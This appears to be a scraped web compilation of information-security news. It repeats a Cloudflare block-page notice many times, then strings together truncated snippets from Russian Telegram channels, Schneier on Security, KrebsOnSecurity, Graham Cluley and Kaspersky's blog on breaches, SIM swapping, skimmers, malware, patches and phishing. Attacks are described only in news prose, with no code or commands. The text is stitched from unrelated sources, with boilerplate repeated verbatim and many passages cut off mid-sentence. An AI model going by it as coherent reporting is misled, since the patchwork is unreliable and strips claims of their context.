Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Обновил и опубликовал на Slideshare свою презентацию про стандарты и руководства по управлению ИБ при взаимодействии с поставщиками. Supply management 1.1.pdf from Andrey Prozorov, CISM

Опубликовал на SlideShare несколько своих старых презентаций по GDPR и Privacy:All about a DPIA - https://www.slideshare.net/AndreyProzorov/all-about-a-dpia-by-andrey-prozorov-20-220518pdfEmployee Monitoring and Privacy - https://www.slideshare.net/AndreyProzorov/employee-monitoring-and-privacypdfGDPR and Personal Data Transfers - https://www.slideshare.net/AndreyProzorov/gdpr-and-personal-data-transfers-11pdfGDPR and Security - https://www.slideshare.net/AndreyProzorov/gdpr-and-securitypdfGDPR RACI - https://www.slideshare.net/AndreyProzorov/gdpr-racipdfGDPR EU Institutions and bodies - https://www.slideshare.net/AndreyProzorov/gdpr-eu-institutions-and-bodiespdf

Я люблю и использую майндкарты уже 15 лет, а недавно обновил свою "Майндкарту о майндкартах", теперь она на английском языке.Скачать ее в PDF и Xmind можно тут - https://www.patreon.com/posts/65251502 или тут - https://boosty.to/isms8020/posts/c69bdcee-f0eb-48be-ab4a-29b1f84d1996А посмотреть прошлый вариант на русском языке тут - https://80na20.blogspot.com/2012/07/blog-post_10.html

На днях вышло официальное обновление стандарта ISO 27001, ISO/IEC 27001:2013/DAmd 1(en) Information technology — Security techniques — Information security management systems — Requirements — AMENDMENT 1. Теперь у нас новый список контролей (мер ИБ) в приложении А, теперь он выровнен с обновленным стандартом ISO 27002:2022, который мы также ожидаем со дня на день.Общее количество контролей сокращено до 93 (в основном путем объединения), добавлено 11 новых:5.7 Threat intelligence5.23 Information security for use of cloud services5.30 ICT readiness for business continuity7.4 Physical security monitoring8.9 Configuration management8.10 Information deletion8.11 Data masking8.12 Data leakage pre…

В новой iOS 16 появился бекдор фича Rapid Security Responses, позволяющая патчить iPhone и аксессуары не дожидаясь обновления ОС. Должна включаться автоматом при обновлении на новую ОС.Идея с точки зрения ИБ конечно прикольная, но усложнит жизни любителям джейблрейка.

Cybershit8 622 subscribersО канале: http://telegra.ph/Cybershit-08-14Связь: Полезный канал про технологии и информационную безопасность.

Нам не поИБ на ИБ.

А вам?О канале: http://telegra.ph/Cybershit-08-14Связь: @cybrsht_botIf you have Telegram, you can view postand join Cybershit right away.

Если вы находитесь в поиске бюджетного инструмента для решения проблемы с паразитивным бот-трафиком, и у вас нет свободных финансов для приобретения какого-нибудь Cloudflare, можно посмотреть в сторону вот этих ультимативных репок для прокачки ваших Nginx или Apache.Настроенный веб-сервер под ключ одной кнопкой (почти). Ну либо если вам нужен какой-то докрученный кастом, то придется курить доки и конфиги из репы.https://github.com/mitchellkrogza/nginx-ultimate-bad-bot-blockerhttps://github.com/mitchellkrogza/apache-ultimate-bad-bot-blocker

Для тех, кто пропустил увлекательный доклад с недавнего BlackHat и DEFCON от представителей Rapid7 про их исследования ПО для Cisco ASA.В текущих реалиях, когда многие остались отрезанными от обновлений и подписок, готовы скачивать различные кряки, образа и клиенты для администрирования штата своих Cisco, такая тема кажется более чем актуальна.Если опустить рассказ про то, как Cisco выпустила патч не закрывающий зарепорченную уязвимость, то основные темы доклада всего две:– Установка вредоносного программного обеспечения для ASA и простые способы внедрения бекдоров в ПО администрирования Cisco ASDM.– Создание вредоносных установочных пакетов и загрузочных образов для модуля FirePOWER. Там в…

Киберпиздец8 640 subscribersО канале: http://telegra.ph/Cybershit-08-14Связь: Полезный канал про технологии и информационную безопасность.

Нам не поИБ на ИБ.

А вам?О канале: http://telegra.ph/Cybershit-08-14Связь: @cybrsht_botIf you have Telegram, you can view postand join Киберпиздец right away.

Наткнулся на проект Casdoor — это достаточно функциональная платформа для организации IAM и SSO с множеством интеграций, провайдеров и удобным интерфейсом. Может использоваться не только как IdP для OAuth, OIDC, SAML и CAS, но и как сервисный провайдер, а внутри куча крутилок для мапинга атрибутов, разные модели управления доступом (RBAC, ABAC, ACL), политики и даже поддержка WebAuthn!В целом выглядит все очень круто — репа с 3,5к звездочек, удобные демо, если хочется потыкать в живую, документация, API и готовый SDK и пр.Но нет ничего идеального. На гите десятки свежих issue, релизы выходят каждый день, а в демке бывает что-то не работает. Сложилось впечатление, что пытаются охватить необъ…

На днях смотрел видео от Hashicorp и был приятно удивлен, что они сопровождают свои вебинары сурдопереводчиком для глухонемых. Я давно такого не видел, а тут еще и тематика такая. Показалось, что это прям очень круто!Я в этой теме полный профан, но знаю что там существует несколько диалектов, и в целом язык может отличаться в зависимости от географии.Интересно как он пополняется новыми жестами, ведь в IT куча сленговых слов и аббревиатур. А еще кажется можно это автоматизировать и визуализировать в режиме реального времени без участия человека, хотя с человеком это наверное намного приятнее. Крутая и узкоспециализированная профессия с погружением в область.Кажется в текущих реалиях таких шт…

​​Сегодня частично затронем тему EndpointSecurity и поговорим про инструмент osquery. Исторически osquery сделали инфраструктурщики в Facebook, под свои задачи еще в 2013, а после публикации в опенсорс он завоевал сердечки и остальных.Эта штука способа превратить ОС в реляционную базу данных, а вас вооружить всей мощью SQL чтобы с этими данными работать.Глянуть историю процессов в динамике, найти стремные файлы используя YARA-правила или отобразить открытые порты — проще простого, собрать все недавние http запросы, включая JA3 от TLS — изи, нужно что-то посложнее? На самом деле все ограничивается вашей фантазией потому что у osquery есть свой SDK и возможность подключения расширений, написа…

Ого, а вы наверное и забыли, что подписаны на этот канал?Судя по датам последних публикаций канал перешел в режим один пост в пол года. Причины этому максимально банальны — большое кол-во работы и как следствие частичная потеря интереса к ИБ. Как там это сейчас называется, выгорание?За последний год удалось позаниматься интереснейшими проектами, задачами, пообщаться с крутыми специалистами и восстановиться.Лишний раз убедился, что в ИТ и ИБ огромное количество талантливых и умных людей, которые вне публичного поля и просто тихо делают свою работу, делают ее по-настоящему!Еще нужно сказать, что очень важно уметь делать перерывы и успевать просто пожить.Основная идея этого лиричного текста в …

Застрахуй братуху, застрахуй или зачем вам ИБ, если можно просто купить полис?https://cloud.yandex.ru/insurance-offerhttps://sber.insure/products/cyber/Судя по количеству материалов по запросу "cybersecurity insurance" за рубежом это уже частая практика, посмотрим приживется ли у нас. Любопытно глянуть на реальные кейсы.p.s ого первый пост с лета :0

Friday Squid Blogging: Another Giant Squid Washes Up on New Zealand BeachThis one has chewed-up tentacles.

(Note that this is a different squid than the one that recently washed up on a South African beach.)

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Posted on September 23, 2022 at 4:32 PM • 0 Comments

[…]Being able to read reflected headline-size text isn’t quite the privacy and security problem of being able to read smaller 9 to 12 pt fonts.

But this technique is expected to provide access to smaller font sizes as high-resolution webcams become more common.

“We found future 4k cameras will be able to peek at most header texts on almost all websites and some text documents,” said Long.

[…]A variety of factors can affect the legibility of text reflected in a video conference participant’s glasses.

Consequently, not every glasses-wearing person will necessarily provide adversaries with reflected screen sharing.

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

Devon Allen—a wide receiver for the Philadelphia Eagles—was disqualified from the 110-meter hurdles at the World Athletics Championships a few weeks ago for a false start.

Here’s the problem: You can’t see the false start.

Nobody can see the false start.

They have science that shows it is beyond human capabilities to react that fast.

One thousandth of a second too fast, according to World Athletics’ science.

And bank cards can be stopped.

Since it is the first time that card will have been used on the new device, a one-off security passcode is demanded.

That verification passcode is sent by the bank to the stolen phone.

The code flashes up on the locked screen of the stolen phone, leaving the thief to tap it into their own device.

Once accepted, they have control of the bank account.

The Washington Post is reporting that the US Customs and Border Protection agency is seizing and copying cell phone, tablet, and computer data from “as many as” 10,000 phones per year, including an unspecified number of American citizens.

This is done without a warrant, because “…courts have long granted an exception to border authorities, allowing them to search people’s devices without a warrant or suspicion of a crime.”CBP’s inspection of people’s phones, laptops, tablets and other electronic devices as they enter the country has long been a controversial practice that the agency has defended as a low-impact way to pursue possible security threats and determine an individual’s “intention…

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

It’s big:

The breach appeared to have compromised many of Uber’s internal systems, and a person claiming responsibility for the hack sent images of email, cloud storage and code repositories to cybersecurity researchers and The New York Times.

“They pretty much have full access to Uber,” said Sam Curry, a security engineer at Yuga Labs who corresponded with the person who claimed to be responsible for the breach. “This is a total compromise, from what it looks like.”

It looks like a pretty basic phishing attack; someone gave the hacker their login credentials. And because Uber has lousy internal security, lots of people have access to everything. So once a hacker gains a foothold, they have…

One thief stands near you while you’re in the grocery store, intercepting your key’s transmitted signal with a radio transceiver.

Another stands near your car, with another transceiver, taking the signal from their friend and passing it on to the car.

But Tesla’s credit card keys, like many digital keys stored in cell phones, don’t work via radio.

Those keys had previously been seen as more secure, since their range is so limited and their handshakes with cars are more complex.

While this specific use case focuses on Tesla, it’s a proof of concept—NFC handshakes can, and eventually will, be reverse-engineered.

Upcoming Speaking EngagementsThis is a current list of where and when I am scheduled to speak:I’m speaking as part of a Geneva Centre for Security Policy course on Cyber Security in the Context of International Security, online, on September 22, 2022.

I’m speaking at IT-Security INSIDE 2022 in Zurich, Switzerland, on September 22, 2022.

The list is maintained on this page.

Posted on September 14, 2022 at 12:08 PM • 0 Comments

Weird Fallout from Peiter Zatko’s Twitter WhistleblowingPeople are trying to dig up dirt on Peiter Zatko, better known as Mudge.

For the record, I have not been contacted.

I’m not sure if I should feel slighted.

Posted on September 14, 2022 at 6:51 AM • 0 Comments

The Wall Street Journal is reporting that the FBI has recovered over $30 million in cryptocurrency stolen by North Korean hackers earlier this year.

It’s only a fraction of the $540 million stolen, but it’s something.

In its effort to mask the stolen crypto, Lazarus Group used more than 12,000 different addresses, according to Chainalysis.

Unlike bank transactions that happen through private networks, movement between crypto accounts is visible to the world on the blockchain.

Advanced blockchain-monitoring tools and cooperation from centralized crypto exchanges enabled the FBI to trace the crypto to where Lazarus Group tried to cash out, investigators said.

It’s pretty nasty:The malware was dubbed “Shikitega” for its extensive use of the popular Shikata Ga Nai polymorphic encoder, which allows the malware to “mutate” its code to avoid detection.

Shikitega alters its code each time it runs through one of several decoding loops that AT&T said each deliver multiple attacks, beginning with an ELF file that’s just 370 bytes.

Shikitega also downloads Mettle, a Metasploit interpreter that gives the attacker the ability to control attached webcams and includes a sniffer, multiple reverse shells, process control, shell command execution and additional abilities to control the affected system.

Shikitega also uses cloud hosting solutions to store parts o…

About Bruce SchneierI am a public-interest technologist, working at the intersection of security, technology, and people.

I've been writing about security issues on my blog since 2004, and in my monthly newsletter since 1998.

I'm a fellow and lecturer at Harvard's Kennedy School, a board member of EFF, and the Chief of Security Architecture at Inrupt, Inc.

This personal website expresses the opinions of none of those organizations.

“I have hired a lawyer there and I want you to send me as quickly as possible to clear these baseless charges,” Kloster reportedly told the Bulgarian court this week.

In several private exchanges cybercrime forums, the RSOCKS administrator claimed ownership of the RUSdot spam forum.

Despite maintaining his innocence, Kloster reportedly told the Bulgarian judge that he could be useful to American investigators.

“That’s why they want me.”The Bulgarian court agreed, and granted his extradition.

Kloster’s fiancee also attended the extradition hearing, and reportedly wept in the hall outside the entire time.

“Yo, Dan, please bro send the 200k,” Foreshadow said in the video, which was shot on Sept. 15 in the backseat of a moving car.

Bleeding from a swollen mouth with two handguns pointed at his head, Foreshadow pleaded for his life.

As Foreshadow’s hostage video began making the rounds on SIM-swapping Telegram channels, a rumor surfaced that Foreshadow had died after being shot in the leg.

It soon emerged that Foreshadow had not died, and that he was cooperating with the Federal Bureau of Investigation (FBI).

That story is also available on the Click Here podcast — Throwing Bricks for $$$: Violence-as-a-Service Comes of Age.

“The three men made off in a VW Golf and were shortly stopped nearby,” reads a statement by the Lincolnshire Police.

Discoli said he didn’t know any of the men charged, but believes they were hired by one of his enemies.

The United Kingdom is home to a number of young men accused of stealing millions of dollars worth of cryptocurrencies via SIM swapping.

U.S. investigators say O’Connor also played a central role in the 2020 intrusion at Twitter, wherein Twitter accounts for top celebrities and public figures were forced to tweet out links to cryptocurrency scams.

According to prosecutors, both Barr and O’Connor have a history of swatting their enemies and their SIM swapping victims.

Here’s a look at some of the more sophisticated deep insert skimmer technology that fraud investigators have recently found in the wild.

The insert skimmer pictured above is approximately .68 millimeters tall.

In January 2022, NCR produced a report on motorized deep insert skimmers, which offers a closer look at other insert skimmers found targeting this same line of ATMs.

Here are some variations on deep insert skimmers NCR found in recent investigations:The image on the left below shows another deep insert skimmer and its constituent components.

If you enjoyed this story, check out these related posts:Crooks Go Deep With Deep Insert SkimmersDumping Data from Deep Insert SkimmersHow Cyber …

Microsoft today released software patches to plug at least 64 security holes in Windows and related products.

Also listed under active attack is CVE-2022-32817, which has been fixed on macOS 12.6 (Monterey), macOS 11.7 (Big Sur), iOS 15.7 and iPadOS 15.7, and iOS 16.

“Interestingly, this CVE is also listed in the advisory for iOS 16, but it is not called out as being under active exploit for that flavor of the OS,” Trend Micro’s Childs noted.

Either way, it’s time to update your Apple devices.”Apple’s iOS 16 includes two new security and privacy features — Lockdown Mode and Safety Check.

Finally, Adobe released seven patches addressing 63 security holes in Adobe Experience Manager, Bridge, …

But when dealing with strangers from the Internet, there is always a risk that the person you’ve agreed to meet has other intentions.

These safe trading places exist is because sometimes in-person transactions from the Internet don’t end well for one or more parties involved.

I recently stumbled upon one of these designated exchange places by accident, hence my interest in learning more about them.

According to the list maintained at Safetradestations.com, there are four other such designated locations in Northern Virginia.

Either way, here are a few tips on staying safe while transacting in real life with strangers from the Internet (compliments of the aforementioned safe trading websites).

Recall that the shooters in the West Chester, Pa. incident shouted “Justin Active was here.” Justin Active is the nickname of an individual who is just as active in the same cybercriminal channels, but who has vehemently denied knowledge of or participation in the shooting.

Justin Active said on Telegram that the person targeted in the shooting was his ex-girlfriend, and that the firebombing targeted another friend of his.

Justin Active has claimed for months that McGovern-Allen was responsible for both attacks, saying they were intended as an intimidation tactic against him.

There are dozens of SIM swappers who are now teenage or 20-something millionaires, by virtue of having stolen vast s…

Last year, I posted a series of articles about a purported “breach” at Ubiquiti.

My sole source for that reporting was the person who has since been indicted by federal prosecutors for his alleged wrongdoing – which includes providing false information to the press.

As a result of the new information that has been provided to me, I no longer have faith in the veracity of my source or the information he provided to me.

I always endeavor to ensure that my articles are properly sourced and factual.

This time, I missed the mark and, as a result, I would like to extend my sincerest apologies to Ubiquiti, and I have decided to remove those articles from my website.

Phishers are enjoying remarkable success using text messages to steal remote access credentials and one-time passcodes from employees at some of the world’s largest technology companies and customer support firms.

In mid-June 2022, a flood of SMS phishing messages began targeting employees at commercial staffing firms that provide customer support and outsourcing to thousands of companies.

Between July 10 and July 16, dozens of T-Mobile employees fell for the phishing messages and provided their remote access credentials.

KrebsOnSecurity did hear from Christopher Knauer, global chief security officer at Sitel Group, the customer support giant that recently acquired Sykes.

“To deploy securit…

Scammers are using invoices sent through PayPal.com to trick recipients into calling a number to dispute a pending charge.

The message’s subject read, “Billing Department of PayPal updated your invoice.”While the phishing message attached to the invoice is somewhat awkwardly worded, there are many convincing aspects of this hybrid scam.

Also, the email headers in the phishing message (PDF) show that it passed all email validation checks as being sent by PayPal, and that it was sent through an Internet address assigned to PayPal.

The best advice to sidestep phishing scams is to avoid clicking on links that arrive unbidden in emails, text messages and other mediums.

Most phishing scams invoke…

That same month, they also sold data on 1.4 million customers of Mexican lending platform Yotepresto.

But this history was either overlooked or ignored by Group-IB, the Singapore-based cybersecurity firm apparently hired by Banorte to help respond to the data breach.

“We ask you to remove this post containing Banorte data.

Instead of helping, they pushed the organization from the hill.”Kurt Seifried, director of IT for the CloudSecurityAlliance, was similarly perplexed by the response to the Banorte breach.

“I mean, isn’t selling breach data a worse crime usually than slander or libel?

The Department of Homeland Security (DHS) is urging states and localities to beef up security around proprietary devices that connect to the Emergency Alert System — a national public warning system used to deliver important emergency information, such as severe weather and AMBER alerts.

The DHS warning was prompted by security researcher Ken Pyle, a partner at security firm Cybir.

That may be because the patches were included in version 4 of the firmware for the EAS devices, and many older models apparently do not support the new software.

Pyle soon discovered the device contained the private cryptographic keys and other credentials needed to send alerts through Comcast, the nation’s third…

A cybersecurity firm says it has intercepted a large, unique stolen data set containing the names, addresses, email addresses, phone numbers, Social Security Numbers and dates of birth on nearly 23 million Americans.

The largest item in the archive is a 3.6 gigabyte file called “dbfull,” and it contains 28.5 million records, including 22.8 million unique email addresses and 23 million unique SSNs.

Hold Security founder Alex Holden said a number of patterns in the data suggest it relates to AT&T customers.

In contrast, Gmail users made up more than 30 percent of the data set, with Yahoo addresses accounting for 24 percent.

Holden’s team also examined the number of email records that included…

One way to tame your email inbox is to get in the habit of using unique email aliases when signing up for new accounts online.

Here’s a look at the pros and cons of adopting a unique alias for each website.

When you sign up at a site that requires an email address, think of a word or phrase that represents that site for you, and then add that prefaced by a “+” sign just to the left of the “@” sign in your email address.

For instance, if I were signing up at example.com, I might give my email address as [email protected]

What are the downsides to using email aliases, apart from the hassle of setting them up?

Microsoft today released updates to fix a record 141 security vulnerabilities in its Windows operating systems and related software.

Once again, Microsoft is patching a zero-day vulnerability in the Microsoft Support Diagnostics Tool (MSDT), a service built into Windows.

Microsoft says addressing some of the Exchange vulnerabilities fixed this month requires administrators to enable Windows Extended protection on Exchange Servers.

See Microsoft’s blog post on the Exchange Server updates for more details.

“Another critical vulnerability worth mentioning is an elevation of privilege affecting Active Directory Domain Services (CVE-2022-34691),” SANS wrote.

UK police arrested a 17-year-old teenager in Oxfordshire last night on suspicion of hacking.

The boy, who has not been named, was arrested as part of an investigation by the National Crime Agency (NCA).

Earlier this year, UK police arrested seven people after hacks against firms such as Microsoft, NVIDIA, Ubisoft, Samsung, and Okta.

All of the hacks, like those against Uber and Rockstar Games, were linked to the LAPSUS$ group.

At the time, the father of one of those arrested (who happened to live in Oxford) said that he hoped to convince his teenage son to stop using computers.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

It’s been a few years, but I’m delighted to announce that we’re taking the “Smashing Security” podcast out on the road again.

Between 5-7 October, I will be chairing the UK’s National Information Security Conference (better known as NISC), at Carden Park in Cheshire, UK.

NISC attracts leading CISOs, CTOs, IT security/network managers, compliance/risk managers and IT directors – making it a great opportunity to like-minded professionals to share experiences with their peers.

:)It’s probably the most fun cybersecurity conference I’ve ever been to, bringing together senior information security professionals for three days in a relaxed environment.

And… to make it even more fun this year… the o…

Can negotiating your firm’s ransomware payment actually be fun?

The simulation lets you imagine that you’re a pointy-headed boss at a successful pharmaceutical company in the United States.

After a ransomware attack, the company’s day-to-day operations are severely disrupted, meaning that servers are down, products can’t ship, and employees aren’t being paid.

By my reckoning it’s better to have some experience of negotiation a ransomware payment in the safety of an online game, then having to learn on the job when your company gets hit for real.

And if the FT‘s creative exploration of the topic helps more business people understand the seriousness of ransomware, then that has to be a good t…

Hosts:Graham Cluley – @gcluleyCarole Theriault – @caroletheriaultGuest:Iain Thomson – @iainthomsonEpisode links:Sponsored by:Pentera – Pentera’s Automated Security Validation Platform is designed to help teams increase their security posture against modern day threats across the entire attack surface.

Evaluate your security readiness with continuous and consistent autonomous testing with granular visibility into every execution along the way.

Bitwarden – Password security you can trust.

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @Sm…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

The UK’s National Cyber Security Centre (NCSC) has warned that fraudsters are sending out emails and SMS texts urging homeowners to sign up for a discount on their energy bills.

Reader Nicola shared with me a screenshot of an SMS she received, claiming to link to a site where recipients could sign up for their rebate.

The truth is that your utility provider will give you your rebate automatically if you are eligible – you don’t need to sign up.

BBC News reports that it has seen other domains being used in similar scam messages, including:energy-bill-online.commyenergybillonline.comrebate-ogem.comtotalsolutions24-7.co.ukEmails have also been seen which attempt to pull a similar scam.

The NCS…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Then the hacker found a terrible blunder on the internal network.

Uber has suffered a security breach which allowed a hacker to break into its network, and access the company’s internal documents and systems.

The hacker, who has shared screenshots of internal Uber systems to confirm his unauthorised access, claims to be 18-years-old.

credentials for a Thycotic PAM admin account, which then helped unlock access to many of Uber’s internal systems.

Hi @here I announce i am a hacker and uber has suffered a data breach.

In a newly-published advisory directed at the healthcare payment industry, the FBI warns that cybercriminals are using a cocktail of publicly-available Personally Identifiable Information (PII) and social engineering techniques to impersonate victims and obtain access to files, healthcare portals, payment information, and websites.

With compromised login credentials for healthcare payment processors exploited, the criminals divert payments to bank accounts under their own control.

From June 2018 to January 2019, the FBI reports, cybercriminals broke into at least 65 healthcare payment processors across the United States and replaced legitimate customer banking and contact information with a…

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Rory Cellan-Jones.

Bitwarden – Password security you can trust.

The Cyber Security Inside podcast – Relevant cybersecurity topics in clear, easy-to-understand language.

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @SmashinSecurity, or on the Smashing Security subreddit, or visit our website for more episodes.

Мы наблюдаем новую кампанию по массовой рассылке вредоносных писем по сотрудникам компаний с приложенным шпионским зловредом Agent Tesla.

Английский язык в письмах не идеален, но, чтобы этот факт не смущал получателя, в качестве фирмы-отправителя обычно выбирают резидентов каких-то не англоговорящих стран — то Болгарии, то Малайзии.

То есть авторы рассылки уделили достаточно много внимания подготовке, что нехарактерно для таких массовых кампаний — в прошлом подобные приемы чаще встречались в целевых атаках.

В приведенном выше примере в качестве отправителя вообще фигурирует newsletter, что нормально для маркетинговой рассылки, но абсолютно ненормально для отправления письма с запросом цен н…

В этом посте расскажем еще об одном.

Немного о троянах HarlyС 2020 года в Google Play было обнаружено более 190 приложений, зараженных Harly.

Судя по нижней границе данных по количеству скачиваний приложения в магазине, суммарно его установили более 4,8 миллиона раз.

Злоумышленники скачивают обычные приложения из Google Play и внедряют в них вредоносный код, после чего загружают их в магазин под другим именем.

Как и другие трояны подобного рода, Harly собирает информацию об устройстве пользователя, в особенности о мобильной сети.

Совершенно очевидно, что древние авторы этой сказки постарались объяснить потомкам концепцию атаки MitM (Man-in-the-middle): в то время как Смерть считает, что работает напрямую с сервером богов, в реальности в обмен информацией вмешивается мальчик.

Не в силах справиться с источником атаки, он делает все возможное для того, чтобы минимизировать ущерб.

Этот мудрый человек взял петуха редкой породы и объявил, что как только вор дотронется до его шеи, птица закричит.

БедаВ сказке «Беда», рассказывается о том, как надо и как не надо обращаться с киберугрозами.

Как видите, если внимательно читать хакасские народные сказки, то можно подготовиться к встрече с большинством киберугроз, которые актуа…

Совершенно не удивительно, что и киберпреступники не остаются в стороне.

Не говоря уже о том, что в мире гейминга существует пиратство, читы и черные рынки аккаунтов — огромное пространство возможностей для злоумышленников.

В общем, на геймеров опять объявлена охота: злоумышленники распространяют троян-стилер RedLine под видом читов для игр и пытаются украсть аккаунты, номера карт и все-все-все.

Смотрите на YouTube: троян под видом читаИменно с читами и связана нынешняя находка исследователей «Лаборатории Касперского», детали которой изложены в отчете на Securelist.

Во-вторых, идущий в комплекте с RedLine криптомайнер добавляет к этому следующие спецэффекты:тормозящий компьютер;повышенный и…

Борцы с уязвимостями компании Microsoft продемонстрировали свежий улов: 64 уязвимости в продуктах и сервисах, из которых пять — критические.

С учетом того, что по информации Microsoft эксплойт для данной уязвимости уже применяется в атаках, закрыть ее следует как можно скорее.

CVE-2022-34700 и CVE-2022-35805 — пара уязвимостей в ПО Microsoft Dynamics CRM для управления взаимоотношениями с клиентами.

В теории это могло бы означать, что злоумышленники могли начать использовать ее, однако не в этом случае.

Как оставаться в безопасностиПервым делом следует закрыть уязвимости, для которых уже есть патчи.

Компьютерная игра Genshin Impact в жанре action-adventure была разработана китайской компанией miHoYo Limited и выпущена для ПК и игровых консолей в сентябре 2020 года.

Вместе с версией игры для Windows устанавливается модуль для борьбы с игровыми мошенниками, в состав которого входит драйвер mhyprot2.sys.

Драйвер имеет цифровую подпись и обеспечивает защитному механизму игры широкие права в системе.

Если коротко, то некие атакующие решили, что практически неограниченные права в системе, обеспечиваемые этим драйвером, и его легитимный цифровой сертификат можно использовать как инструменты таргетированной атаки.

Не стоит забывать и о том, что на начальной стадии атаки ее организаторы получил…

Из содержания письма становится ясно, что «топливные компенсации» — это скидка 50% на покупку топливных карт, которыми можно расплачиваться на заправках.

Однако, если посмотреть на адрес отправителя, становится понятно, что перед нами ненастоящее письмо от государственного сервиса.

Простой поиск по номерам постановления и приказа не дает никаких результатов, что в случае с публичными официальными документами достаточно подозрительно.

Различные ограничения — по времени, по количеству доступных мест или, как в данном случае, сразу и по тому и по другому — еще один излюбленный прием мошенников.

Ну и финальный аргумент: топливная карта действует на территории России и в восьми странах ближнего …

К сожалению, безобидные с виду мини-приложения для браузера могут быть значительно опаснее, чем кажется на первый взгляд.

Что такое расширения и какими они бывают?

А вот о том, что для работы расширения ему нужен доступ ко всем данным со всех веб-сайтов, пользователь может узнать только при непосредственной установке расширения.

Создатели расширения в этом случае зарабатывают за счет переходов пользователей по их отслеживаемым партнерским ссылкам на сайты рекламодателей.

Браузерные расширения — это полезный инструмент, но важно относиться к ним с осторожностью и помнить, что они совсем не так безобидны, как может показаться.

Согласно данным отчета ESG, существует три подхода к организации структуры SOC и обработки уведомлений, и все они примерно одинаково популярны.

В SOC «Лаборатории Касперского» у каждого аналитика ежемесячно есть два рабочих дня, в которые он не обрабатывает уведомления, а переключается на более творческие задачи.

Модели работы SOC в разных компаниях сильно различаются в зависимости от их зрелости, бюджетов и релевантных ИБ-рисков.

В SOC требуется все больше специалистов-универсалов, способных справиться с разнообразными угрозами.

Пока неизвестно, как эти тренды повлияют на существующие подходы, но очевидно одно: пришло время проанализировать состояние персонала и процессов в SOC и начать вн…

Наша глобальная команда реагирования на киберинциденты (Kaspersky Global Emergency Response Team) проанализировала инциденты, в расследовании которых эксперты участвовали в 2021 году, и подготовила подробный отчет.

С полным текстом можно ознакомиться, заполнив форму на сайте Securelist, а мы бы хотели поделиться основными находками и базовыми рекомендациями от экспертов по реагированию.

Начальный вектор атакиЧаще всего злоумышленники пытались проникнуть в инфраструктуру компаний благодаря эксплуатации уязвимостей в публично доступных приложениях (в 53,6% случаев).

В 17,9% случаев они использовали ранее скомпрометированные учетные данные и в 14,3% — применяли вредоносные письма.

Он разработа…

Но, в конце концов, может, продавец только недавно зарегистрировался в сервисе и ищет первых клиентов?

В нормальной ситуации в этом нет никакой необходимости: крупные маркетплейсы и онлайн-магазины всегда проводят все сделки через свою платформу.

Чтобы разобраться в происходящем, мы решили попробовать «купить» дачный бассейн и написали по номеру, предложенному в его описании на сайте онлайн-магазина.

Мы решили проверить: выбрали пункт выдачи, оплатили товар (в этот раз наш выбор пал на пылесос) на платформе и стали ждать.

